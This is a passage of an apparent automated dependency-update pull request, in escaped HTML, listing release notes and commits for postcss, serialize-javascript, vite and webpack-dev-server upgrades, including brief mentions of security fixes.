href=\"https://github.com/postcss/postcss/commit/9825dca02c33cf610e2a842be767468b67fbecf9\"\u003e\u003ccode\u003e9825dca\u003c/code\u003e\u003c/a\u003e Fix code format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/55789c865281e2be194fa5b4e41dd046be3a2307\"\u003e\u003ccode\u003e55789c8\u003c/code\u003e\u003c/a\u003e Update dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/84fbbe9009cb3cc3bbb4cc3a9b65d468f4844d95\"\u003e\u003ccode\u003e84fbbe9\u003c/code\u003e\u003c/a\u003e Install older pnpm action for old Node.js\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/9f860bd78ec1dbc4f0ae72d693f03f956baa38cb\"\u003e\u003ccode\u003e9f860bd\u003c/code\u003e\u003c/a\u003e Revert pnpm action for old Node.js\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/08771986d47359545f502e009763e223b66bfcf6\"\u003e\u003ccode\u003e0877198\u003c/code\u003e\u003c/a\u003e Update CI actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/b2d1a335cea818f8b27e5cfb90147648afe3e582\"\u003e\u003ccode\u003eb2d1a33\u003c/code\u003e\u003c/a\u003e Fix linter warnings\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/0700dac92283bc259977dff2743ca74a00f58267\"\u003e\u003ccode\u003e0700dac\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2088\"\u003e#2088\u003c/a\u003e from rootvector2/add-oss-fuzz-harness\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/postcss/postcss/compare/8.4.31...8.5.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `serialize-javascript` from 6.0.1 to 7.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/yahoo/serialize-javascript/releases\"\u003eserialize-javascript's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.0.5\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eImprove robustness and validation for array-like object serialization.\u003c/li\u003e\n\u003cli\u003eFix an issue where certain object structures could lead to excessive CPU usage.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eFor more details, please see GHSA-qj8w-gfj5-8c6v.\u003c/p\u003e\n\u003ch2\u003ev7.0.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease: v7.0.4 by \u003ca href=\"https://github.com/okuryu\"\u003e\u003ccode\u003e@​okuryu\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/211\"\u003eyahoo/serialize-javascript#211\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/yahoo/serialize-javascript/compare/v7.0.3...v7.0.4\"\u003ehttps://github.com/yahoo/serialize-javascript/compare/v7.0.3...v7.0.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.0.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(CVE-2020-7660): fix for RegExp.flags and  Date.prototype.toISOString (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/207\"\u003e#207\u003c/a\u003e)  2e609d0\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump lodash from 4.17.21 to 4.17.23 (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/206\"\u003e#206\u003c/a\u003e)  42b7cdb\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/compare/v7.0.2...v7.0.3\"\u003ehttps://github.com/yahoo/serialize-javascript/compare/v7.0.2...v7.0.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eci: bump GitHub Actions to latest versions by \u003ca href=\"https://github.com/okuryu\"\u003e\u003ccode\u003e@​okuryu\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/203\"\u003eyahoo/serialize-javascript#203\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: setup trusted publishing workflow by \u003ca href=\"https://github.com/okuryu\"\u003e\u003ccode\u003e@​okuryu\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/204\"\u003eyahoo/serialize-javascript#204\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erelease: v7.0.2 by \u003ca href=\"https://github.com/okuryu\"\u003e\u003ccode\u003e@​okuryu\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/205\"\u003eyahoo/serialize-javascript#205\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/yahoo/serialize-javascript/compare/v7.0.1...v7.0.2\"\u003ehttps://github.com/yahoo/serialize-javascript/compare/v7.0.1...v7.0.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd warning about using this package to send arbitrary data to worker threads by \u003ca href=\"https://github.com/valadaptive\"\u003e\u003ccode\u003e@​valadaptive\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/200\"\u003eyahoo/serialize-javascript#200\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003esecurity: sanitize function bodies by \u003ca href=\"https://github.com/redonkulus\"\u003e\u003ccode\u003e@​redonkulus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/199\"\u003eyahoo/serialize-javascript#199\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: tweak README by \u003ca href=\"https://github.com/okuryu\"\u003e\u003ccode\u003e@​okuryu\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/201\"\u003eyahoo/serialize-javascript#201\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erelease: v7.0.1 by \u003ca href=\"https://github.com/okuryu\"\u003e\u003ccode\u003e@​okuryu\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/202\"\u003eyahoo/serialize-javascript#202\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redonkulus\"\u003e\u003ccode\u003e@​redonkulus\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/199\"\u003eyahoo/serialize-javascript#199\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/yahoo/serialize-javascript/compare/v7.0.0...v7.0.1\"\u003ehttps://github.com/yahoo/serialize-javascript/compare/v7.0.0...v7.0.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch2\u003eBreaking Changes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erequires Node.js v20+\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump mocha from 10.2.0 to 10.4.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/pull/178\"\u003eyahoo/serialize-javascript#178\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/df3f1c1fa9ca16b050ae893cb63ac23c91deed55\"\u003e\u003ccode\u003edf3f1c1\u003c/code\u003e\u003c/a\u003e release: v7.0.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/f147e90269b58bb6e539cfdf3d0e20d6ad14204b\"\u003e\u003ccode\u003ef147e90\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/eec32e08c5ac51bba2d8042101f6d2622c133110\"\u003e\u003ccode\u003eeec32e0\u003c/code\u003e\u003c/a\u003e release: v7.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/d50571505a7776191346d714618867455b3354c1\"\u003e\u003ccode\u003ed505715\u003c/code\u003e\u003c/a\u003e 7.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9\"\u003e\u003ccode\u003e2e609d0\u003c/code\u003e\u003c/a\u003e fix(CVE-2020-7660): fix for RegExp.flags and  Date.prototype.toISOString (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/207\"\u003e#207\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/42b7cdbf32c289f42d7d9247fd3261dc7550e9ce\"\u003e\u003ccode\u003e42b7cdb\u003c/code\u003e\u003c/a\u003e build(deps-dev): bump lodash from 4.17.21 to 4.17.23 (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/206\"\u003e#206\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/44f544b85a8e2719890a0853184d83c4ecbc9bcb\"\u003e\u003ccode\u003e44f544b\u003c/code\u003e\u003c/a\u003e release: v7.0.2 (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/205\"\u003e#205\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/bba0ddd954b5bcca48857f9cb5f16379aa143b26\"\u003e\u003ccode\u003ebba0ddd\u003c/code\u003e\u003c/a\u003e ci: setup trusted publishing workflow (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/204\"\u003e#204\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/235f6ea0b827bdc1625046522b0bc50fd582c412\"\u003e\u003ccode\u003e235f6ea\u003c/code\u003e\u003c/a\u003e ci: bump GitHub Actions to latest versions (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/203\"\u003e#203\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/f7fff15630a450dfcbcb88d33f7dc30b4f1e41f8\"\u003e\u003ccode\u003ef7fff15\u003c/code\u003e\u003c/a\u003e release: v7.0.1 (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/202\"\u003e#202\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/yahoo/serialize-javascript/compare/v6.0.1...v7.0.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for serialize-javascript since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vite` from 4.4.7 to 7.3.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v4.5.14/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.14 (2025-04-30)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19965\"\u003e#19965\u003c/a\u003e, check static serve file inside sirv (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19967\"\u003e#19967\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/7739479\"\u003e7739479\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19965\"\u003e#19965\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19967\"\u003e#19967\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: run format (\u003ca href=\"https://github.com/vitejs/vite/commit/99afb60\"\u003e99afb60\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.13 (2025-04-10)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19830\"\u003e#19830\u003c/a\u003e, reject requests with \u003ccode\u003e#\u003c/code\u003e in request-target (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19832\"\u003e#19832\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/41f3819\"\u003e41f3819\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19830\"\u003e#19830\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19832\"\u003e#19832\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.12 (2025-04-03)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19782\"\u003e#19782\u003c/a\u003e, fs check with svg and relative paths (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19785\"\u003e#19785\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/0a3dcf5\"\u003e0a3dcf5\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19782\"\u003e#19782\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19785\"\u003e#19785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.11 (2025-03-31)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19761\"\u003e#19761\u003c/a\u003e, fs check in transform middleware (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19763\"\u003e#19763\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/26e1764\"\u003e26e1764\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19761\"\u003e#19761\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19763\"\u003e#19763\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.10 (2025-03-24)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19702\"\u003e#19702\u003c/a\u003e, fs raw query with query separators (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19704\"\u003e#19704\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/315695e\"\u003e315695e\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19702\"\u003e#19702\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19704\"\u003e#19704\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.9 (2025-01-21)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: \u003ccode\u003epreview.allowedHosts\u003c/code\u003e with specific values was not respected (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19246\"\u003e#19246\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/0bc52e0\"\u003e0bc52e0\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19246\"\u003e#19246\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: allow CORS from loopback addresses by default (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19249\"\u003e#19249\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/8f63cd6\"\u003e8f63cd6\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19249\"\u003e#19249\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.8 (2025-01-20)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: try parse \u003ccode\u003eserver.origin\u003c/code\u003e URL (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19241\"\u003e#19241\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/3680bad\"\u003e3680bad\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19241\"\u003e#19241\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.7 (2025-01-20)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: \u003ccode\u003ecrypto.getRandomValues\u003c/code\u003e is not available in old Node versions (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19237\"\u003e#19237\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/f4d3c46\"\u003ef4d3c46\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19237\"\u003e#19237\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/9bfe2b1bc5d755cd7898d17147b9a1bb7f55fed2\"\u003e\u003ccode\u003e9bfe2b1\u003c/code\u003e\u003c/a\u003e release: v4.5.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/7739479d87330b367c9338b732ed9789871082cc\"\u003e\u003ccode\u003e7739479\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19965\"\u003e#19965\u003c/a\u003e, check static serve file inside sirv (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19967\"\u003e#19967\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/99afb601e9d5d6cad25b38f44ce4c02083dbcb62\"\u003e\u003ccode\u003e99afb60\u003c/code\u003e\u003c/a\u003e chore: run format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/cd60e8bb2e354ca03d2e5e5b0d0a151cf40698e2\"\u003e\u003ccode\u003ecd60e8b\u003c/code\u003e\u003c/a\u003e release: v4.5.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/41f3819c869b86aec02e760fd3dabd5e370db284\"\u003e\u003ccode\u003e41f3819\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19830\"\u003e#19830\u003c/a\u003e, reject requests with \u003ccode\u003e#\u003c/code\u003e in request-target (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19832\"\u003e#19832\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/6104add2ed0204b9821f73dc230f9c05caaad405\"\u003e\u003ccode\u003e6104add\u003c/code\u003e\u003c/a\u003e release: v4.5.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/0a3dcf5875de6bcea64e2f75bfa452740ca3dfb0\"\u003e\u003ccode\u003e0a3dcf5\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19782\"\u003e#19782\u003c/a\u003e, fs check with svg and relative paths (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19785\"\u003e#19785\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/07ddc3ea3e5750f4761169064be87122f9b698f1\"\u003e\u003ccode\u003e07ddc3e\u003c/code\u003e\u003c/a\u003e release: v4.5.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/26e1764d54e7440d90226ebb82acbed457807d30\"\u003e\u003ccode\u003e26e1764\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19761\"\u003e#19761\u003c/a\u003e, fs check in transform middleware (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19763\"\u003e#19763\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/86e7a6b8e40cd2fd545744b82b2bc805ced92847\"\u003e\u003ccode\u003e86e7a6b\u003c/code\u003e\u003c/a\u003e release: v4.5.10\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vitejs/vite/commits/v4.5.14/packages/vite\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 4.15.1 to 5.2.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca 